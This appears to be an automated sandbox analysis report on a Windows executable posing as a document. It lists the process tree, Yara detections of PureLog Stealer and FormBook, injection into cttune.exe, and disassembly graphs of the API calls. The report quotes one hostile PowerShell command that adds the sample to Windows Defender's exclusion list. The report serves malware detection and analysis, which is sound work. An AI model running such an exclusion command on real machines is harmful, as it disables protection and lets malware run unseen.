                                      Target ID:0
                                      Start time:10:08:52
                                      Start date:04/05/2024
                                      Path:C:\Users\user\Desktop\Doc 1Z881A080453968203.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                                      Imagebase:0xa80000
                                      File size:733'184 bytes
                                      MD5 hash:51812B068C74B61DB320570D6D13EE07
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1417000725.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1414525368.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1414525368.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:10:08:53
                                      Start date:04/05/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                                      Imagebase:0x7f0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:10:08:54
                                      Start date:04/05/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6ee680000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:10:08:53
                                      Start date:04/05/2024
                                      Path:C:\Users\user\Desktop\Doc 1Z881A080453968203.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                                      Imagebase:0x420000
                                      File size:733'184 bytes
                                      MD5 hash:51812B068C74B61DB320570D6D13EE07
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:10:08:54
                                      Start date:04/05/2024
                                      Path:C:\Users\user\Desktop\Doc 1Z881A080453968203.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                                      Imagebase:0x330000
                                      File size:733'184 bytes
                                      MD5 hash:51812B068C74B61DB320570D6D13EE07
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:10:08:54
                                      Start date:04/05/2024
                                      Path:C:\Users\user\Desktop\Doc 1Z881A080453968203.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                                      Imagebase:0x350000
                                      File size:733'184 bytes
                                      MD5 hash:51812B068C74B61DB320570D6D13EE07
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:10:08:54
                                      Start date:04/05/2024
                                      Path:C:\Users\user\Desktop\Doc 1Z881A080453968203.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                                      Imagebase:0xca0000
                                      File size:733'184 bytes
                                      MD5 hash:51812B068C74B61DB320570D6D13EE07
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:10:09:52
                                      Start date:04/05/2024
                                      Path:C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe"
                                      Imagebase:0xc00000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:14
                                      Start time:10:09:54
                                      Start date:04/05/2024
                                      Path:C:\Windows\SysWOW64\cttune.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\cttune.exe"
                                      Imagebase:0x1f0000
                                      File size:72'192 bytes
                                      MD5 hash:E515AF722F75E1A5708B532FAA483333
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:15
                                      Start time:10:10:10
                                      Start date:04/05/2024
                                      Path:C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe"
                                      Imagebase:0xc00000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:16
                                      Start time:10:10:21
                                      Start date:04/05/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff6d20e0000
                                      File size:676'768 bytes
                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:8.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:52
                                        Total number of Limit Nodes:9
                                        execution_graph 19930 146ad50 19934 146ae37 19930->19934 19942 146ae48 19930->19942 19931 146ad5f 19935 146ae59 19934->19935 19936 146ae7c 19934->19936 19935->19936 19950 146b0d2 19935->19950 19954 146b0e0 19935->19954 19936->19931 19937 146ae74 19937->19936 19938 146b080 GetModuleHandleW 19937->19938 19939 146b0ad 19938->19939 19939->19931 19943 146ae59 19942->19943 19944 146ae7c 19942->19944 19943->19944 19948 146b0d2 LoadLibraryExW 19943->19948 19949 146b0e0 LoadLibraryExW 19943->19949 19944->19931 19945 146ae74 19945->19944 19946 146b080 GetModuleHandleW 19945->19946 19947 146b0ad 19946->19947 19947->19931 19948->19945 19949->19945 19952 146b0e0 19950->19952 19951 146b119 19951->19937 19952->19951 19958 146a228 19952->19958 19955 146b0f4 19954->19955 19956 146b119 19955->19956 19957 146a228 LoadLibraryExW 19955->19957 19956->19937 19957->19956 19959 146b6c0 LoadLibraryExW 19958->19959 19961 146b739 19959->19961 19961->19951 19962 146d4e0 19963 146d526 GetCurrentProcess 19962->19963 19965 146d578 GetCurrentThread 19963->19965 19967 146d571 19963->19967 19966 146d5b5 GetCurrentProcess 19965->19966 19968 146d5ae 19965->19968 19969 146d5eb 19966->19969 19967->19965 19968->19966 19970 146d613 GetCurrentThreadId 19969->19970 19971 146d644 19970->19971 19972 1464668 19973 146467f 19972->19973 19974 146468b 19973->19974 19976 1464798 19973->19976 19977 14647bd 19976->19977 19981 1464898 19977->19981 19985 14648a8 19977->19985 19983 14648a8 19981->19983 19982 14649ac 19983->19982 19989 1464508 19983->19989 19987 14648aa 19985->19987 19986 14649ac 19987->19986 19988 1464508 CreateActCtxA 19987->19988 19988->19986 19990 1465938 CreateActCtxA 19989->19990 19992 14659fb 19990->19992 19993 146d728 DuplicateHandle 19994 146d7be 19993->19994

                                        Executed Functions

                                        Function 054901A8 Relevance: 3.1, Strings: 2, Instructions: 564COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 44 54901a8-54901d0 45 54901d2 44->45 46 54901d7-54902fe 44->46 45->46 55 5490300-549030d 46->55 56 54902a6-5490323 46->56 55->56 58 5490329-5490a67 56->58 59 549084d-549088f 56->59 63 5490892-5490896 59->63 64 54903fa-54903fe 63->64 65 549089c-54908a2 63->65 66 5490400-549040e 64->66 67 5490413-5490419 64->67 65->59 68 54908a4-54908ff 65->68 69 5490493-54904c5 66->69 70 5490464-5490468 67->70 84 5490901-5490934 68->84 85 5490936-5490960 68->85 88 54904ef 69->88 89 54904c7-54904d3 69->89 72 549041b-5490427 70->72 73 549046a-5490481 70->73 75 5490429 72->75 76 549042e-5490433 72->76 77 5490483-5490486 73->77 78 5490436-549043c 73->78 75->76 76->78 82 5490489-549048d 77->82 80 549043e-5490442 78->80 81 5490461 78->81 86 5490445-5490452 80->86 81->70 82->69 87 54903e0-54903f7 82->87 99 5490969-54909e8 84->99 85->99 90 5490458-549045f 86->90 91 54903b7-54903db 86->91 87->64 95 54904f5-549051b 88->95 92 54904dd-54904e3 89->92 93 54904d5-54904db 89->93 90->73 91->82 98 54904ed 92->98 93->98 104 549051e-5490522 95->104 98->95 112 54909ef-5490a02 99->112 106 5490571-54905a7 104->106 107 5490524-549055c 104->107 106->86 111 54905ad-5490626 106->111 114 5490a11-5490a16 107->114 126 5490628 111->126 127 549062f-5490630 111->127 112->114 116 5490a18-5490a26 114->116 117 5490a2d-5490a4c 114->117 116->117 121 549036f-5490ac0 117->121 122 5490a52-5490a59 117->122 126->127 128 5490687-549068d 127->128 129 549068f-5490751 128->129 130 5490632-5490654 128->130 141 5490753-549078c 129->141 142 5490792-5490796 129->142 131 549065b-5490684 130->131 132 5490656 130->132 131->128 132->131 141->142 143 5490798-54907d1 142->143 144 54907d7-54907db 142->144 143->144 145 54907dd-5490816 144->145 146 549081c-5490820 144->146 145->146 146->68 148 5490826-549083e 146->148 148->104 151 5490844-549084b 148->151 151->63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :$~
                                        • API String ID: 0-2431124681
                                        • Opcode ID: dcf73e02af646950473dcfa0e8c8265b99d1320318285205a06df36ec3da2bb5
                                        • Instruction ID: 28d12f3e435d15a4666d3a9cbd567e92924496420ef6a9e05e0c482b7cc40d69
                                        • Opcode Fuzzy Hash: dcf73e02af646950473dcfa0e8c8265b99d1320318285205a06df36ec3da2bb5
                                        • Instruction Fuzzy Hash: 3642D375A00219DFDF29CFA9C944AD9BBB2FF48304F1580EAE509AB221D7319D91DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146D4D0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0146D55E
                                        • GetCurrentThread.KERNEL32 ref: 0146D59B
                                        • GetCurrentProcess.KERNEL32 ref: 0146D5D8
                                        • GetCurrentThreadId.KERNEL32 ref: 0146D631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: c8c22520f1df60078f9c84527667310f8ad971a27516edba94f099fc265176f4
                                        • Instruction ID: 3db24dadbc5307171f11ecc686401c976f2186ff2683a3794e5ad658f648c523
                                        • Opcode Fuzzy Hash: c8c22520f1df60078f9c84527667310f8ad971a27516edba94f099fc265176f4
                                        • Instruction Fuzzy Hash: 9C5187B0E003498FDB04DFAAD548B9EBBF5FF88314F20845AE409A72A1D7745944CF26
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146D4E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0146D55E
                                        • GetCurrentThread.KERNEL32 ref: 0146D59B
                                        • GetCurrentProcess.KERNEL32 ref: 0146D5D8
                                        • GetCurrentThreadId.KERNEL32 ref: 0146D631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: d9c7924a7051330564ddd16607c319301264d3a8c33b35ed0eb55659c718fc94
                                        • Instruction ID: 0e70bd18f72d3b05456059a9a32b969a8ca3a55d069c29ff59951cbbd81c411f
                                        • Opcode Fuzzy Hash: d9c7924a7051330564ddd16607c319301264d3a8c33b35ed0eb55659c718fc94
                                        • Instruction Fuzzy Hash: F85187B0E0030A8FDB04DFAAC548B9EBBF1BF88304F208459D409A73A1DB745940CF66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146AE48 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 152 146ae48-146ae57 153 146ae83-146ae87 152->153 154 146ae59-146ae66 call 146a1c0 152->154 156 146ae9b-146aedc 153->156 157 146ae89-146ae93 153->157 160 146ae7c 154->160 161 146ae68 154->161 163 146aede-146aee6 156->163 164 146aee9-146aef7 156->164 157->156 160->153 207 146ae6e call 146b0d2 161->207 208 146ae6e call 146b0e0 161->208 163->164 165 146af1b-146af1d 164->165 166 146aef9-146aefe 164->166 171 146af20-146af27 165->171 168 146af00-146af07 call 146a1cc 166->168 169 146af09 166->169 167 146ae74-146ae76 167->160 170 146afb8-146b078 167->170 173 146af0b-146af19 168->173 169->173 202 146b080-146b0ab GetModuleHandleW 170->202 203 146b07a-146b07d 170->203 174 146af34-146af3b 171->174 175 146af29-146af31 171->175 173->171 178 146af3d-146af45 174->178 179 146af48-146af51 call 146a1dc 174->179 175->174 178->179 183 146af53-146af5b 179->183 184 146af5e-146af63 179->184 183->184 185 146af65-146af6c 184->185 186 146af81-146af8e 184->186 185->186 188 146af6e-146af7e call 146a1ec call 146a1fc 185->188 193 146af90-146afae 186->193 194 146afb1-146afb7 186->194 188->186 193->194 204 146b0b4-146b0c8 202->204 205 146b0ad-146b0b3 202->205 203->202 205->204 207->167 208->167
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0146B09E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 315eb7b5feb630458881ff8613a37e0ccf004caaa4c34edf09fe5a426908da7a
                                        • Instruction ID: fccbeda7ee88e0b458b03f6a4e1b4a0ab6cabb37b3c6a1548a3fbedba1adb7b5
                                        • Opcode Fuzzy Hash: 315eb7b5feb630458881ff8613a37e0ccf004caaa4c34edf09fe5a426908da7a
                                        • Instruction Fuzzy Hash: CA8135B0A00B058FD728DF2AD45479ABBF5FF88204F108A2ED596D7B60D735E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01464508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 209 1464508-14659f9 CreateActCtxA 212 1465a02-1465a5c 209->212 213 14659fb-1465a01 209->213 220 1465a5e-1465a61 212->220 221 1465a6b-1465a6f 212->221 213->212 220->221 222 1465a80 221->222 223 1465a71-1465a7d 221->223 225 1465a81 222->225 223->222 225->225
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 014659E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 69d062e96b42bf515476a667bb406cbb28fe6b3487460031917e2e6b510b3325
                                        • Instruction ID: 5842ba4c423f8d7ebc5f0b4563793931292b92f4162dfc3880bcdd0a538b9f46
                                        • Opcode Fuzzy Hash: 69d062e96b42bf515476a667bb406cbb28fe6b3487460031917e2e6b510b3325
                                        • Instruction Fuzzy Hash: 7641F3B0D0071DCFEB24DFA9C884B8EBBB5BF89704F20816AD408AB251DB755946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146592D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 226 146592d-14659f9 CreateActCtxA 228 1465a02-1465a5c 226->228 229 14659fb-1465a01 226->229 236 1465a5e-1465a61 228->236 237 1465a6b-1465a6f 228->237 229->228 236->237 238 1465a80 237->238 239 1465a71-1465a7d 237->239 241 1465a81 238->241 239->238 241->241
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 014659E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: c0729765f4dcdd16eb4c0e5df9c5a2808136f4c53c759151218e426797ce7617
                                        • Instruction ID: ee25a0421a9f5bce04ae6810f40adcc8ea68d07e6262a1bed44a2d7a280dce34
                                        • Opcode Fuzzy Hash: c0729765f4dcdd16eb4c0e5df9c5a2808136f4c53c759151218e426797ce7617
                                        • Instruction Fuzzy Hash: F24105B1D0071ACFEB24DFA9C884B8EFBB5BF89704F20816AD408AB255DB755945CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146D720 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 242 146d720-146d726 243 146d728-146d7bc DuplicateHandle 242->243 244 146d7c5-146d7e2 243->244 245 146d7be-146d7c4 243->245 245->244
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0146D7AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: ee344794fadfa9f203f72548b9aef4760e89e5abb6f31e1913bab236c860da8e
                                        • Instruction ID: a405bc8fb5da2d86228c23609c0a923a0780a74a4f61365cb6c7194b143c5cf6
                                        • Opcode Fuzzy Hash: ee344794fadfa9f203f72548b9aef4760e89e5abb6f31e1913bab236c860da8e
                                        • Instruction Fuzzy Hash: 0021D4B59002499FDB10CF9AD984ADEBBF8EB48320F14802AE954A7350D379A954CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146D728 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 248 146d728-146d7bc DuplicateHandle 249 146d7c5-146d7e2 248->249 250 146d7be-146d7c4 248->250 250->249
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0146D7AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 0bef345d2762237f5d5a664eec7c563a0e4f5650f4a6a2acf59975ec3af3cff7
                                        • Instruction ID: 9327fc2fb1efd6f498c7619188e506a58efffa801d2e5fccf7fe27bda158dbd3
                                        • Opcode Fuzzy Hash: 0bef345d2762237f5d5a664eec7c563a0e4f5650f4a6a2acf59975ec3af3cff7
                                        • Instruction Fuzzy Hash: 7421E4B5D002499FDB10CFAAD884ADEBBF8FB48320F14801AE954A3350D379A950CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146A228 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 253 146a228-146b700 255 146b702-146b705 253->255 256 146b708-146b737 LoadLibraryExW 253->256 255->256 257 146b740-146b75d 256->257 258 146b739-146b73f 256->258 258->257
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0146B119,00000800,00000000,00000000), ref: 0146B72A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: b2aa737e51c54acb067c26cd76cecbfa299ba4a000ef924999cfece11b57fc66
                                        • Instruction ID: d85c32db94158a5badbf92165f14747afd5de03719d223f66d17cb18ba46b8fa
                                        • Opcode Fuzzy Hash: b2aa737e51c54acb067c26cd76cecbfa299ba4a000ef924999cfece11b57fc66
                                        • Instruction Fuzzy Hash: 2E1114B69003098FDB10CFAAC444B9EFBF8EB88315F14842ED519A7310C379A945CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146B6BA Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 261 146b6ba-146b700 262 146b702-146b705 261->262 263 146b708-146b737 LoadLibraryExW 261->263 262->263 264 146b740-146b75d 263->264 265 146b739-146b73f 263->265 265->264
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0146B119,00000800,00000000,00000000), ref: 0146B72A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: cd8c4b34477cb7b80774dd37694dd03026604a77c06233415899971399f0c477
                                        • Instruction ID: 9e965fcac0ee6481c1476d1b730a06b1f5955e209ad89ff1300b9fdb00c81485
                                        • Opcode Fuzzy Hash: cd8c4b34477cb7b80774dd37694dd03026604a77c06233415899971399f0c477
                                        • Instruction Fuzzy Hash: 452117B6D003498FDB14CFAAD484ADEFBF9EB88320F14842ED555A7210C379A545CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0146B038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 268 146b038-146b078 269 146b080-146b0ab GetModuleHandleW 268->269 270 146b07a-146b07d 268->270 271 146b0b4-146b0c8 269->271 272 146b0ad-146b0b3 269->272 270->269 272->271
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0146B09E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 8aa9d845af3aacc0a6d7adde04658cb7c069cf345544687f3f98df1a21e2165a
                                        • Instruction ID: 923d52200ff660d1f3653e63af878266de83442a6b22f528a8a8761d41734bf3
                                        • Opcode Fuzzy Hash: 8aa9d845af3aacc0a6d7adde04658cb7c069cf345544687f3f98df1a21e2165a
                                        • Instruction Fuzzy Hash: 0711E3B5D003498FDB14DF9AC444BDEFBF8EB88324F10842AD569A7610D379A545CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549DB5C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
